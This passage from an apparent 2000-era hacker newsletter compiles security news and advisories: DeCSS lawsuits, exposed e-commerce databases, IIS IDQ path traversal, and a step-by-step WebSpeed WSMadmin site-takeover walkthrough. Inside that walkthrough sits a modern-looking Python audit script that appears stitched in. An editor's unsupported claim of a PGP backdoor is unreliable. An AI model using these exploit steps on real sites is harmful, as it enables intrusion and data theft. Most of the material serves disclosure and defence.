At her old organization, Anti Child Porn Militia, Grigori was dedicated to the use of hacking to disable child pornography Web sites. "We started out very angry, we started out very militant," she said. But a trip to Def Con in Las Vegas made her change her mind. She started talking with people on the right side of the law, and they told her they supported her cause, but not her means. "You can't stop a felony with a felony," she says now. But the decision to go "legal" was a difficult one, and she lost most of her volunteer hackers. "Less than a dozen out of 250 stuck with us," she said. "They didn't like the idea. They just thought we could rip and tear." Browne also says he had a hard time leaving the hacking behind, mostly because he thought it was right. "Which is more illegal? Having children's pictures on the Internet or hacking down the servers?" he asked. "Morally, I felt I was right." But morals don't make hacking the right way to eliminate child pornography, according to Aftab, the author of The Parent's Guide to Protecting Your Children in Cyberspace. She says hacking complicates the fight and casts a cloud over groups like hers that work closely with law enforcement. "We need help but we need the right help," she said. When a site is taken down off the Web, it turns up somewhere else, usually within minutes, she said. And if a server is destroyed, so is the evidence of the person behind it. "I'd frankly love to able to do all kinds of things to these groups," she said. "You can't let your gut reaction dictate how you react to a disgusting situation." Getting a gauge on the prevalence of child pornography is difficult. Experts say that most of the images of child pornography are downloaded from newsgroups and traded in secret email clubs. Aftab says true child pornography -- the kind that features children who are very young -- isn't very easy to stumble across on the Web. 
It takes some digging, she says, for her volunteers to find about 150 new sites each month. And the reason a group like hers is necessary, she says, is that the technological savvy of the law enforcement is lacking. "When the total technology behind the cops is that one guy uses AOL at home, it's kind of hard to do cyber-forensics," she said. Grigori said she recently asked a federal agent to come to her office for a meeting to talk about the problem. "The one fed looked at my computer like it was a toaster," she said. "I asked him for his email address, and he said, 'I don't have a computer.'" The former deputy chief of the Child Exploitation Unit at the Department of Justice, Robert Flores, also says the government isn't doing its part. Flores has had years of experience tracking down child pornographers and pedophiles, both online and off. But he didn't think he could get his job done as a government employee. "I got to the point where I thought I could do more for families and kids outside of the Justice Department," he said. Flores is now the senior counsel for the Fairfax, Virginia-based National Law Center for Children and Families, a legal resource center for child pornography. "One of the things the Justice Department has failed to do is say that the law applies on the Internet, that the Internet is not a lawless place," he said. The laws forbidding child pornography are fairly new. The Supreme Court first ruled in New York v. Ferber in 1982 that child pornography was not protected by the First Amendment. The decision said the government could ban sexual images with serious literary or artistic value in the interest of preventing "the harmful employment of children to make sexually explicit materials for distribution." Two years later, the justices said the government could outlaw not just the distribution but also the possession of child porn. 
And it is only in the last few years that the Internet has played a role in laws and statutes governing pornography in general, and child pornography in particular. There is currently a schism within the legal community over the definition of child pornography, and whether it should include computer-generated photographs or computer-enhanced photographs that appear to feature children engaged in sex acts, but actually contain adults. But while the courts hammer out the issues, some say citizens shouldn't take matters into their own hands. Flores likened the Internet community's attempt to patrol child pornography to picketers in front of a porn store. It's well-intentioned, but it won't change anything. "My recommendation is that this is not the job for a layman, quite simply," he said. "That's why we pay taxes."

@HWA

26.0 SCRAMDISK (Windows) on the fly encryption for your data.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This isn't new, but it is a VERY good package; several of my colleagues and I use it for sensitive material on our winboxes. The bonus is, it's free software and will offer sufficient protection of data for most users. This is especially useful for using personal data on your drives at work and hiding it from the boss; it's like having your own (secret) hard disk in your work's machine. The other uses are obvious.

A note about PGP: the latest versions have a BACKDOOR that allows federal agencies access to your data. Use an earlier version of PGP (4.2) if you want to make things harder for federal agents to access your data(!) - Ed

The walls have ears, the net has taps, the government (not just your own) IS listening and scanning your data, so protect your privacy and use PGP for sensitive emails or data transmissions; also use SSH instead of telnet for accessing your shell accounts if possible, as many sites are sniffed by hackers daily.
- Ed

http://www.securiteam.com/tools/ScramDisk_-_Disk_Encryption_Tool.html

5/1/2000

ScramDisk - Disk Encryption Tool

Details

Scramdisk is a program that allows the creation and use of virtual encrypted drives. Basically, you create a container file on an existing hard drive that is locked with a specific password. This container can then be mounted by the Scramdisk software, which creates a new drive letter to represent the drive. The virtual drive can then only be accessed with the correct pass phrase. Without the correct pass phrase the files on the virtual drive are totally inaccessible - even physically extracting the data will reveal nothing (since the contents are encrypted). Once the pass phrase has been entered correctly and the drive is mounted, the new virtual drive can be used as a normal drive; files can be saved and retrieved and you can safely install applications onto the encrypted drive.

Scramdisk allows virtual disks to be stored in a number of ways:

1. In a container file on a FAT formatted hard disk.
2. On an empty partition.
3. Stored in the low bits of a WAV audio file (this is called steganography).

This last option is especially interesting, since this WAV file can be sent by e-mail or carried on a diskette without attracting too much attention (since by casual hearing the WAV file sounds like the original sound file).

Details:

Scramdisk can create virtual disks with a choice of a number of 'industry standard' encryption algorithms: Triple-DES, IDEA, MISTY1, Blowfish, TEA (either 16 or 32 rounds), and Square. It also includes a proprietary and very fast algorithm 'Summer' which is provided for minimal security applications and for compatibility with older versions of ScramDisk.

Why not use PGP?

PGP is a great program, but it doesn't allow the on-the-fly encryption of a disk's contents. Instead users have to:

1. Decrypt the existing file
2. Work on the data
3. Re-encrypt the data

The problem is, while the file is decrypted it is vulnerable to interception. Scramdisk is complementary to PGP; PGP is excellent for communication security, but is somewhat lacking in user friendliness when used for data storage security.

Flaws in the system

Scramdisk is not totally secure (and nor is any security program!). There are a number of ways an attacker may try infiltrating your system:

1. Look for applications that leak data. A very well known word-processor has an interesting bug that leaks parts of the raw contents of the disk when saving an OLE Compound Document.

2. Look for data that isn't deleted securely. Ok, everyone knows that you can undelete a file easily. Did you know that even a file that has been 'wiped' could potentially be recovered by looking at the surface of the disk? Deleted files should be securely wiped using an appropriate program (PGP v6+ contains a secure file wiping program).

3. Look for data that has leaked in other ways. Temporary files and the swap file spring to mind. These both need to be securely erased too.

4. Using Van Eck monitoring. Basically, electrical emissions from the monitor, hard drive and even keyboard can be detected and recorded from a distance away. This may allow an eavesdropper to see what's on your screen or detect your pass phrase as you type it.

5. Brute Forcing. This can happen in a number of ways: they can try brute-forcing your pass phrase (it's important to use a large pass phrase that isn't easily guessed; it helps to use both upper and lower case and numbers as well) or they can try to brute force the algorithm. This is hard work (and will take around 2^127 operations with most of the ciphers included with ScramDisk - DES & Summer are exceptions).

6. Some of the ciphers included may be susceptible to attacks not known about in public. The NSA/GCHQ may have a mechanism faster than brute-force of attacking the algorithms. Scramdisk does not include any weak algorithms in the original distribution (apart from Summer, which is included for backwards compatibility), but who can tell what the Intelligence Agencies can do with Blowfish, IDEA, 3DES et al?

7. Install an amended version of ScramDisk on your computer that secretly stores your pass phrase so that it can be later read by a CIA agent. (Or use a program like SKIn98 to do it!) Far fetched? Possibly, but you should be aware that this kind of attack exists. There is no real way to defend against this attack. Check the PGP Signatures of the ScramDisk files against the executables on your computer, but could your copy of PGP have also been amended?

8. Beating you until you spill your pass phrase. Truth drugs also work, apparently.

The software can be downloaded free of charge from:

http://www.scramdisk.clara.net/

@HWA

27.0 HNN:Jan 17: MPAA files more suits over DeCSS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.hackernews.com/arch.html?011700

MPAA Files More Suits over DeCSS
contributed by Project Gamma and Macki

In an effort to stop further distribution of the DeCSS program the Motion Picture Association of America has filed lawsuits in federal courts. This follows similar action two weeks ago by the DVD industry association. The MPAA feels that allowing potential illegal copying of DVDs with the DeCSS program would be a violation of US copyright law.

Wired
http://www.wired.com/news/politics/0,1283,33680,00.html

ZD Net
http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2422893,00.html?chkpt=p1bn

CNN has some interesting quotes from a Warner Home Video spokesperson regarding this whole mess.

CNN - Look about halfway down
http://www.cnn.com/TRANSCRIPTS/0001/11/st.00.html

MPAA has a few interesting things to say as well.

MPAA
http://www.mpaa.org/dvd/content.htm

The folks over at CopyLeft have come up with a T-shirt that has the source code to css_descramble.c printed on it.
(Cool, and only $15) CopyLeft http://copyleft.net/cgi-bin/copyleft/t039.pl?1&back ** These are really neat, check em out.. - Ed 2600 has posted the story of what has happened to them since their involvement began including them being named as a defendant in the case. 2600.com http://www.2600.com/news/2000/0115.html OpenDVD.org is attempting to cover all the developments (and doing a damn good job) in this case including the scheduled injunction for January 18, 2000. OpenDVD.org http://opendvd.org/ Articles: Wired; Movie Studios File DVD Hack Suit Reuters 5:20 p.m. 14.Jan.2000 PST The seven largest US movie studios filed their own lawsuits Friday to prevent several Internet sites from distributing a program that could allow copying of DVD movies. The lawsuits, filed in federal courts in New York and Connecticut, followed a broader lawsuit filed last month in state court in California by a DVD equipment manufacturers group. At issue is a program called DeCSS, written by a Norwegian programmer, that allows users to bypass the encryption scheme used on DVDs to prevent unauthorized copying. But many Internet users and programmers say the software had a simpler, less insidious goal. They said the program was needed to allow people to watch DVD movies on computers running the Linux operating system. The studios argued that by allowing potential illegal copying, the program violated US copyright law. They asked the courts to prohibit four people from distributing the program on their Web sites. A spokesman for the Motion Picture Association of America, the studios' lobbying group, said the Web sites involved were dvd-copy.com, krackdown.com and ct2600.com. Dozens of other Web sites have also carried either the program or source code instructions showing how to write the program. "This is a case of theft," said Jack Valenti, president of the association. 
"The posting of the de-encryption formula is no different from making and then distributing unauthorized keys to a department store." The people who posted the code said they had done nothing wrong, insisting that the program was meant to allow viewing of DVD movies under Linux. "I don't have illegal copies of movies on my site," said Shawn Reimerdes, a computer programmer who maintains the dvd-copy.com Web site. "Just posting these files shouldn't be illegal." Internet advocacy groups have also opposed the lawsuits, arguing that the posting of computer codes on a Web site is a form of speech protected by the First Amendment. "This is definitely an infringement on freedom of speech," said Shari Steele, director of legal services at the Electronic Frontier Foundation, a San Francisco -based cyber-rights advocacy group. "What has been done was totally legal. Posting of the program is legal and there are no pirated movies here." Chris DiBona, who promotes Linux use for VA Linux Systems, said the industry had refused to help create a program to play DVDs under Linux. "The whole reason this happened is because the movie industry itself didn't support Linux," DiBona said. "They thought they could keep this a secret. They failed." The lawsuit relied on the 1998 Millennium Digital Copyright Act, which outlawed the distribution of products designed to crack copyright protection schemes. "If you can't protect that which you own, then you don't own anything," MPAA's Valenti said. In the California case, the court last month turned down the industry's request for a temporary restraining order against a much wider array of defendants, many of whom had only provided a link on their Web page to a page containing the actual program. A hearing is scheduled for next week. 
Friday's lawsuits were filed by Buena Vista Pictures, a unit of Walt Disney, Metro-Goldwyn-Mayer, Paramount Pictures, a unit of Viacom, Sony's Sony Pictures Entertainment, News Corp.'s Twentieth Century Fox Film, Universal Studios, a unit of Seagram, and Warner Bros., a unit of Time Warner.

-=-

MPAA; 404 - sorry article vanished.

@HWA

28.0 WARftpd Security Alert (Will they EVER fix this software??)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://war.jgaa.com/alert/

SECURITY ALERT - WAR FTP DAEMON ALL VERSIONS

Updated February 4th 2000 13:30 Central European Time.

January 5th 2000, a serious security problem with War FTP Daemon 1.70 was reported by email. Two hours after I read the mail, a security alert was sent to the war-ftpd mailing list, the alt.comp.jgaa newsgroup and the bugtraq mailing list. The alert advised all server operators to take the server off-line until further notice.

Brief overview

War FTP Daemon 1.70: The bug allows unrestricted access to any file on the local machine, also for users that have not logged on. If an older ODBC driver is installed, the bug also gives users unlimited access to all system commands, with administrator privileges (this is a bug in ODBC that has been fixed in recent versions). The advice is to take all version 1.70 servers off-line until the server is upgraded! A bugfix (War FTP Daemon 1.71) was released January 8th 2000 14:40 CET. This version is not completely tested yet. Please report any serious problems to jgaa@jgaa.com. I will fix bugs in 1.70 over the next few weeks to make 1.70 a little more comfortable to use while we wait for version 3.

War FTP Daemon 1.67b2 and previous versions: The bug may give privileged users unrestricted access to some files. Users must be logged in, and have at least write or create permissions. Users can not execute commands. A bugfix was released less than 24 hours from when I read the mail that reported the problem.
Buffer overflow problem in 1.6*

On February 2nd 2000 a buffer-overflow problem in the 1.6 versions was reported on BUGTRAQ. The problem does not seem to compromise the security, but the server can easily be crashed by remote attackers, after they have logged in. A fix was released February 3rd 2000, about an hour after I read about the problem.

Bugfixes are released at ftp://ftp.no.jgaa.com and http://war.jgaa.com/alert/files

I'm sorry for any inconveniences caused by these problems.

General news

War FTP Daemon 1.67. I will make a new full distribution for 1.67. Until this is ready, 1.65 must be installed, and then upgraded.

War FTP Daemon 1.72 service release. I will make a service release of the 1.70 series in the near future. Some annoying bugs will be fixed, and a command-line utility to add user accounts interactively, or from scripts, will be released. There will also be a simple DLL wrapper interface for easy integration with other software.

War FTP Daemon 3.0. The development of the next major release continues. 3.0 is currently running under Windows NT and Linux. The server is however not yet ready for alpha-testing. When all the basic functionality is implemented, and debugged, ftp://ftp.jgaa.com will open up, using version 3.0. This can be expected soon. Early versions for Windows 9x, Windows NT, Debian Linux and FreeBSD will be available for download. Version 3.0 will be Open Source, under the GNU Public License. http://download.jgaa.com will open when War FTP Daemon 3.0 moves into early alpha.

Jarle

@HWA

29.0 HNN: Jan 17th: Seven eCommerce Sites Found Vulnerable
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/
contributed by mack

MSNBC found seven ecommerce sites open for business with easily accessible customer databases. By connecting to weakly secured SQL databases MSNBC was able to access the personal information including credit card numbers of 2500 people. All of the sites have been informed of the problem.
(And people act surprised when I tell them that I don't buy anything on the web.) MSNBC http://www.msnbc.com/news/357305.asp Stealing cards easy as Web browsing By Bob Sullivan MSNBC Jan. 14 — Just how easy is it to steal credit card numbers on the Internet? On Thursday, MSNBC was able to view nearly 2,500 credit card numbers stored by seven small e-commerce Web sites within a few minutes, using elementary instructions provided by a source. In all cases, a list of customers and all their personal information was connected to the Internet and either was not password-protected or the password was viewable directly from the Web site. CREDIT CARD THEFT, a problem long lurking in the background of Internet commerce, leaped to the top of consumers’ minds earlier this month when a computer intruder calling himself Maxus was able to break into CD Universe’s database of user credit cards. There’s still speculation about how he did it. But perhaps Maxus didn’t have to work so hard. This week, MSNBC was able to view nearly 2,500 credit card numbers and other data essentially by browsing e-commerce Web sites using a commercially available database tool rather than a Web browser. Not only were the sites storing the credit cards in plain text in a database connected to the Web — the databases were using the default user name and in some cases, no password. These basic security flaws were found by a legitimate Russian software company named Strategy LLC, according to CEO Anatoliy Prokhorov, and shared with MSNBC. He says he tried contacting some of the companies first and got no response. “From our point of view this is just unprofessionalism in a very high degree that’s not explainable,” Prokhorov said. His company writes software that helps consumers compare prices across multiple e-commerce sites, so his developers become familiar with data structures at hundreds of e-commerce sites. He says they weren’t looking to find security flaws, but rather stumbled on these. 
“This is just a hole we passed by, an open door. Our people were amazed.” But security experts were not. Given the speed required to succeed in the fast-paced Internet economy, companies are in a big hurry to publish working Web sites and often skimp on security measures. “This is a microcosm of what’s out there,” said Elias Levy of SecurityFocus.com. Levy’s site was the first to report the CD Universe break-in last weekend. “One could only imagine what they would have found if they were looking for problems.... The problem is fairly widespread, and what Anatoliy has found is a small snapshot.” Prokhorov also contacted SecurityFocus.com with his information, and the site today will issue its own report based on its independent investigation. The security flaws Prokhorov found involve more than just easy-to-steal credit cards. At all seven sites, MSNBC was able to view a wide selection of personal data including billing addresses, phone numbers and in some cases, employee Social Security numbers. Prokhorov sent the list and instructions to MSNBC on Tuesday. It included about 20 Web sites which either had no password protection at all on their database servers — in each case, they were running Microsoft’s SQL Server software — or had password information exposed on their Web site. Connecting to all the sites was as simple as starting SQL Server and opening a connection to the Web site. (Note: Microsoft is a partner in MSNBC.) Expressmicro.com, Computerparts.com, Directmicro.com and Sharelogic.net — were all contacted 24 hours before this story so they could close the security hole. While the flaws are obvious, assessing blame is a much more sticky business. There’s a mounting concern that small businesses are particularly vulnerable to attack; many don’t have computer experts on staff. Other times, non-technically savvy business owners take lowball bids from developers who promise a secure Web site but don’t deliver. 
Then there are inherent problems in software itself that make flaws more likely. In some cases, the server-side code underlying a Web page is viewable if a browser places “::$DATA” at the end of the page’s Web address. That code, normally hidden, can contain any usernames, passwords and other information about any computer connected to that server. This flaw was revealed over two years ago and has since been patched. Four of the vulnerable sites MSNBC found were hosted on the same Web server and had not plugged this hole. But even without knowing that technique, an intruder could have entered the sites anyway — the username required for entering the database was the default “sa,” which stands for “system administrator”; the password was the name of the company. “We used a developer, and obviously the developer didn’t take that flaw into consideration,” said a spokesperson for the sites. “The flaw could have lied within the software, but maybe the developer should have taken that into consideration ... and one thing we didn’t do, we didn’t hire a security company to come in and test our Web site.” Getting a second opinion when building an e-commerce site is a good idea, said security expert Russ Cooper, who maintains the popular NTBugTraq mailing list. “Make a condition of the contract that it has to pass scrutiny of another individual who tests the site,” Cooper recommended. The fundamental problem, he said, is that developers have no liability for flaws they leave behind in e-commerce sites. Merchants are responsible for the cost of any stolen merchandise, while most developer contracts make clear they are not responsible for what happens with a site they build. “So a lot of people end up with a working site but not a secure site.” The other three vulnerable sites MSNBC visited simply used “sa” as the username for their database, and no password. 
Average consumers have no way of knowing how well-guarded their personal information is when they submit it to a Web site. Levy said the problems MSNBC found at these seven sites are hardly isolated. “The blame falls on more than one person. You can’t rush out to set up an e-commerce site regardless of how much you want to make money. ... Many people don’t give (security) a second thought,” he said. One of the fundamental flaws in all these sites — and, experts say, in many other sites — is the storing of private consumer information in the first place. While encryption techniques that scramble the data are available, it’s often kept on a computer in plain text — one step away from the Internet. While that’s more convenient, experts agree it’s a bad idea. “My advice is, if nothing else, don’t store the data where it physically has access to the Web,” said Wesley Wilhelm, a fraud prevention consultant at the Internet Fraud Prevention Advisory Council. “Take them off every night and make a sneakernet run.” As for consumers, there isn’t much they can do to ascertain how well a Web site is guarding their personal information. Some experts suggest using only one card online, and religiously checking credit card bills. While consumers are liable for at most $50 of fraudulent purchases, they are responsible for catching them and alerting their bank. MSNBC’s Curtis Von Veh contributed to this story.

@HWA

30.0 HNN:Jan 17: Scotland Yard Investigating Cyber Ransom Demands
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/
contributed by tom

It is alleged that a team of sophisticated professional electronic intruders have broken into twelve multinational companies and have issued ransom demands to prevent the release of stolen information. This report only names one of the companies in question, Visa, and says that Scotland Yard is investigating.
(While it would appear that Visa has admitted to the intrusion, we would like to know who the other companies are.)

The UK Times
http://www.the-times.co.uk/news/pages/sti/2000/01/16/stinwenws01028.html?999

January 16 2000 BRITAIN

Hacker gang blackmails firms with stolen files
Jon Ungoed-Thomas and Stan Arnaud

A BRITISH group of hackers has broken into the computer systems of at least 12 multinational companies and stolen confidential files. It has issued ransom demands of up to £10m and is also suspected of hiring out its services. Scotland Yard is now investigating the attacks, which computer experts have described as the most serious systematic breach ever of companies' security in Britain. "The group is using very sophisticated techniques and has been exchanging information via e-mail and internet chat," said an investigator. Visa confirmed last week that it had received a ransom demand last month, believed to have been for £10m. "We were hacked into in mid-July last year," said Russ Yarrow, a company spokesman. "They gained access to some corporate material and we informed both Scotland Yard and the FBI." It is understood the hackers stole computer "source codes" that are critical to programming, and threatened to crash the entire system. If Visa's system crashed for just one day, the company - which handles nearly £1 trillion business a year from customers holding 800m Visa cards - could lose tens of millions of pounds. "We received a phone call and an e-mail to an office in England demanding money," Yarrow said. The company contacted police after the ransom demand. "We hardened the system, we sealed it and they did not return. We have firewalls upon firewalls, but are concerned that anyone got in." Scotland Yard's computer crime unit is now scrutinising e-mail traffic between several known hackers in England and Scotland.
Last month officers from the unit flew to Hopeman, a Scottish fishing village, and seized equipment from the home of James Grant, who works for a local computer company. He has been interviewed by detectives and Visa security experts. It is understood that he has given a legal undertaking to Visa not to discuss the matter. "He is saying nothing at all," said his mother, Rhona. "That is a situation that will not change in the future." Grant, 20, studied computing in nearby Elgin, and now works for Data Converters, based in Elgin. His father is a member of the civilian security staff at RAF Lossiemouth air base and his mother a care worker. Detectives are studying attacks on at least 12 companies that they believe have been penetrated by the group and others that may be connected, including one within the Virgin group, in which a hacker tried to break into the UK mailing system. They believe the group may also be acting as paid specialists for information brokers who trade corporate secrets. "These are professionals and there is some evidence that suggests some of the activity was contracted and paid for," said a computer expert involved in the investigation. The group's success has exposed flaws in security. The internet company CD Universe last week confirmed it had called in the FBI after being blackmailed by a hacker who had copied more than 300,000 of its customer credit card files. Scotland Yard said: "There is an ongoing investigation into the incident involving Visa, but it is too early to speculate about the involvement of a group." @HWA 31.0 HNN:Jan 17: Pay Phone Fraud Committed with Drinking Straw ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SUCK THIS! From HNN http://www.hackernews.com/ contributed by deeeek Telstra (Australian Telephone Company) has to upgrade 29,000 payphones due to fraud involving a drinking straw. The problem affects 80% of the pay phones installed since 1997. 
No information about exactly how the fraud was committed was given. (A Straw? Oh, there must be a text file on this somewhere.)

Fairfax IT
http://it.fairfax.com.au/breaking/20000114/A24452-2000Jan14.html

Scam forces Telstra to fix 29,000 pay phones
9:17 Friday 14 January 2000
AAP

TELSTRA is urgently modifying 80 per cent of its public pay phones after a scam was discovered involving a drinking straw and free phone calls around the world. Telstra would have the 29,000 vulnerable phones rectified soon, Telstra's public affairs manager Michael Herskope said yesterday. The Spanish-manufactured coin and phone card-operated Smart pay phone was phased into the Australian network from 1997. The scam potentially cost Telstra millions of dollars in unlimited STD and ISD calls since then, but Telstra can only speculate. "We have a rough idea, but that's not something we're really going to publicise,'' Herskope said. The scam was made public on the front page of Albury-Wodonga's The Border Morning Mail yesterday. The newspaper was told by perpetrators that the low-tech scam had been well known since the phones were introduced as part of a $100 million upgrade of the public phone national network. One source said some people may have learnt about it from the Internet. The paper accompanied a man to three public phones chosen at random and observed him make free calls, including one to New York. Telstra had initially dismissed the scam as a myth, the paper said. But Herskope denied that Telstra only learnt of the fraud from the country newspaper. "We've known about it for a little while,'' he said. "It's pretty hard to articulate weeks, days. I'm not sure how it was brought to our attention but it certainly was.'' He said rectifying the problem was a simple procedure. Without disclosing how the fraud was perpetrated, he said there was no design fault in the phone. "This particular fault will be closed off very shortly,'' he said.
@HWA

32.0 Owning sites that run WebSpeed web db software
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Source: win2k security advice mailing list.
From: George <georger@NLS.NET>
To: <win2ksecadvice@LISTSERV.NTSECURITY.NET>
Sent: Friday, February 04, 2000 7:32 PM
Subject: Webspeed security issue leaves sites vulnerable

I reported this to Progress (maker of Webspeed) a month ago and they said they would fix it but since then I've not seen any fixes released. I also pondered whether or not to release this information because some rather large web databases use Webspeed but I do believe in full disclosure as the best security so here goes...

Webspeed is a website creation language used by some of the larger db based websites on the net. Version 3 comes with a java GUI configuration program. This configuration program has certain security setting options in it, one of which doesn't actually do anything. There is one option to turn off access to a utility called WSMadmin. It's in the messenger section of the GUI config program. However checking or unchecking this option doesn't change anything. In fact to turn this feature off you have to hand edit the ubroker.properties file. Look for the following entries:

AllowMsngrCmds=1

and each time you find this set it =0 in each of the sections. This will disable the feature (you want to do this on the production server).

AllowMsngrCmds=0

Ok, now the exploit to show how serious an issue this is on the web.
It's just a misconfiguration really but it's caused by a bug in the java config program (I tested the NT version but since the config program is java it may also affect other platforms)

Exploit:

go to search engines and search for "wsisa.dll", I used google 3rd page or further (first 3 pages are all junk)

Go to URL similar to http://www.domain.com/scripts/wsisa.dll/extra/somepage.htm with your browser

change the url in the browser to http://www.domain.com/scripts/wsisa.dll/WService=anything?WSMadmin (note capitals are important)

click on the link "End Sessions Logging and Display Sessions Info" (note you may have to start logging first then stop it if they've never used the logging feature)

When you pick the End Sessions Logging choice it displays the log, find a statement in the log for the default service "Default Service = nameofservice"

back up one page (hit your back button)

type nameofservice into the Verify WebSpeed Configuration box and click the verify button.

If everything worked you now own their site. I won't explain how to use the utility but anyone familiar with this should know exactly how dangerous this is.

Geo.
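An added example, not part of George's post and not Progress code: a small Python audit that does what the post says the GUI checkbox does not, finding every section of ubroker.properties in which AllowMsngrCmds is still 1 and rewriting those entries to 0. It assumes the file is laid out as [Section] headers over key=value lines; the sample file and its section names are constructed.

```python
"""Find and fix AllowMsngrCmds=1 in a WebSpeed ubroker.properties file.

Added example; not code from the original post or from Progress. It
assumes the file is laid out as [Section] headers over key=value lines.
"""
import re

SECTION_RE = re.compile(r"^\s*\[(?P<name>[^\]]+)\]\s*$")
KEY_RE = re.compile(r"^\s*AllowMsngrCmds\s*=\s*(?P<value>\S*)\s*$", re.IGNORECASE)

# Constructed sample: two broker sections and a messenger section.
# Section names are illustrative, not taken from a real installation.
SAMPLE = """\
[UBroker.WS]
portNumber=3055
[UBroker.WS.wsbroker1]
AllowMsngrCmds=1
srvrStartupParam=-p web/objects/web-disp.p
[UBroker.WS.wsbroker2]
AllowMsngrCmds=0
[WebSpeed.Messengers.CGIIP]
AllowMsngrCmds = 1
"""


def find_enabled_sections(text):
    """Return the sections in which AllowMsngrCmds is set to anything but 0.

    The post says to set the key to 0 in every section where it appears,
    so a section that never mentions it is not reported.
    """
    enabled = []
    section = "(no section)"
    for line in text.splitlines():
        header = SECTION_RE.match(line)
        if header:
            section = header.group("name")
            continue
        key = KEY_RE.match(line)
        if key and key.group("value") != "0":
            enabled.append(section)
    return enabled


def disable_msngr_cmds(text):
    """Return a copy of the file with every AllowMsngrCmds entry set to 0.

    Only those lines are rewritten; every other line is kept byte-for-byte
    so the result can be diffed against the original before deployment.
    """
    fixed = []
    for line in text.splitlines(keepends=True):
        if KEY_RE.match(line):
            ending = "\n" if line.endswith("\n") else ""
            fixed.append("AllowMsngrCmds=0" + ending)
        else:
            fixed.append(line)
    return "".join(fixed)


if __name__ == "__main__":
    # Audit first, then confirm the rewritten file passes the audit.
    # Because the GUI option silently does nothing, rerun the audit after
    # any change made through the configuration program.
    for name in find_enabled_sections(SAMPLE):
        print("WSMadmin still reachable via section:", name)
    assert find_enabled_sections(disable_msngr_cmds(SAMPLE)) == []
```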
_____________________________________________________________________
** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net

@HWA

33.0 Cerberus Information Security Advisory (CISADV000202)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Cerberus Information Security Advisory (CISADV000202)

http://www.cerberus-infosec.co.uk/advisories.html

Released : 2nd February 2000
Name : IDQ
Affected Systems : Microsoft Windows NT 4 running Internet Information Server 3 or 4
Issue : Attackers can access files outside of the web virtual directory system
Author : David Litchfield (mnemonix@globalnet.co.uk)

Description
*********

Any web site running Internet Information Server 3 or 4 and using Internet Data Query files to provide search functionality on the site may be exposed. IIS also comes with some sample IDQ scripts that are vulnerable so any website with these sample files left on is at risk. Using these IDQ scripts or even custom scripts it is possible to break outside of the web virtual root and gain unauthorized access to files, such as log files and in certain cases the backup version of the Security Accounts Manager (sam._). It does require for the attacker to know the path to the file, for the file to be on the same logical disk drive as the IDQ file and for the ACL to allow read access to the anonymous Internet account or the Everyone/guests group.

Details
*****

The extent of this security hole depends upon whether the recent "webhits" patch has been installed. See http://www.microsoft.com/technet/security/bulletin/ms00-006.asp

If the patch has been installed there is still a vulnerability - however, those that have not installed this patch are most at risk. Microsoft are re-releasing this advisory and the updated patch. Please note that Windows 2000 does not seem to be vulnerable to this.
Cerberus' vulnerability scanner, CIS, has now been updated to check for this issue. For those that already have a copy of the scanner you can download the updated module from http://www.cerberus-infosec.co.uk/webscan.dll - however those that do not yet have the scanner, if you would like a copy please go to http://www.cerberus-infosec.co.uk/ and follow the Cerberus Internet Scanner link on the frontpage.

If the "webhits" patch HAS NOT been installed
************************************

Any idq file that resolves remote user input for any part of the template file is dangerous. eg:

CiTemplate = %TemplateName%

The ISAPI application that deals with IDQ queries is idq.dll and it will follow double dots in paths to template files, meaning an attacker can break out of the web root.

If the idq file appends .htx to the CiTemplate eg:

CiTemplate=/iissamples/issamples/%TemplateName%.htx

some may think this will limit attackers to viewing only .htx files. Not so. Quoting from the Index Server documentation (/iishelp/ix/htm/ixidqhlp.htm), "Index Server does not support physical paths longer than the Windows NT shell limit (260 characters)." Due to this limit it is possible to append lots of spaces onto the name of the file we want to read, thereby pushing the .htx out of the buffer, and we're served back the file.

IDQ files known to be at risk in one way or another:

prxdocs/misc/prxrch.idq
iissamples/issamples/query.idq
iissamples/exair/Search/search.idq
iissamples/exair/Search/query.idq
iissamples/issamples/fastq.idq

There may be more.

If the "webhits" patch HAS been installed
*******************************

Machines that have had the patch installed will only be vulnerable if the IDQ file does not specify a .htx extension eg:

CiTemplate = %TemplateName%

and

CiTemplate = /somedir/otherdir/%TemplateName%

are vulnerable whereas

CiTemplate = /somedir/otherdir/%TemplateName%.htx

is not vulnerable.

Solution:
*******

Review your IDQ files to determine if you are at risk.
If so edit them and use hardcoded template files. eg

CiTemplate=%TemplateName%

to

CiTemplate=/your-virtual-directory/your-htx-file.htx

and then edit your search form to reflect this change. Remove any sample files from the system - not just idq files. Apply the updated patch.

About Cerberus Information Security, Ltd
********************************

Cerberus Information Security, Ltd, a UK company, are specialists in penetration testing and other security auditing services. They are the developers of CIS (Cerberus' Internet security scanner) available for free from their website: http://www.cerberus-infosec.co.uk

To ensure that the Cerberus Security Team remains one of the strongest security audit teams available globally they continually research operating system and popular service software vulnerabilities leading to the discovery of "world first" issues. This not only keeps the team sharp but also helps the industry and vendors as a whole, ultimately protecting the end consumer. As testimony to their ability and expertise one just has to look at exactly how many major vulnerabilities have been discovered by the Cerberus Security Team - over 40 to date, making them a clear leader of companies offering such security services.

Founded in late 1999, by Mark and David Litchfield, Cerberus Information Security, Ltd are located in London, UK but serve customers across the World. For more information about Cerberus Information Security, Ltd please visit their website or call on +44(0) 181 661 7405

Permission is hereby granted to copy or redistribute this advisory but only in its entirety.

Copyright (C) 2000 by Cerberus Information Security, Ltd
